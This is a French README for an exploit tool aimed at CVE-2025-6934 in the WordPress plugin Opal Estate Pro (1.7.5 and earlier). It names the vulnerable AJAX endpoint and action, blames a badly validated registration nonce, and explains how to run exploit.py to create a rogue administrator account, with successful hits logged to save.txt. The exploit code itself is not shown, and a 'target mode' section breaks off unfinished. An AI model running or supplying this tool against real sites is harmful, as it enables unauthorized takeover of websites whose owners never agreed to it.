
Opal Estate Pro <= 1.7.5 - Escalade de privilèges non authentifiée
CVE-2025-6934 est une vulnérabilité critique dans le plugin WordPress Opal Estate Pro (≤ v1.7.5).
Ce bogue permet à un attaquant non authentifié de créer un nouveau compte administrateur en envoyant une requête conçue à :
/wp-admin/admin-ajax.php?action=opalestate_register_form
La cause première réside dans l'analyse du nonce (opalestate-register-nonce) lors du processus d'enregistrement, qui n'est pas correctement validée.
Cette faille permet aux attaquants de contourner l'enregistrement normal et de créer directement un nouveau compte avec des privilèges d'administrateur.
Exécutez l'outil d'exploitation avec Python 3 :
python3 exploit.py
Vous serez invité à fournir :
username > Nom d'utilisateur du nouveau compte administrateur
password > Mot de passe du nouveau compte administrateur
email > Adresse email du nouveau compte
Mode cible :
En cas de succès, les résultats sont enregistrés dans save.txt au format suivant :
URL: https://example.com
USERNAME: admin123
PASSWORD: passw0rd!
EMAIL: [email protected]
ROLE: administrator
/wp-admin/admin-ajax.php si possible.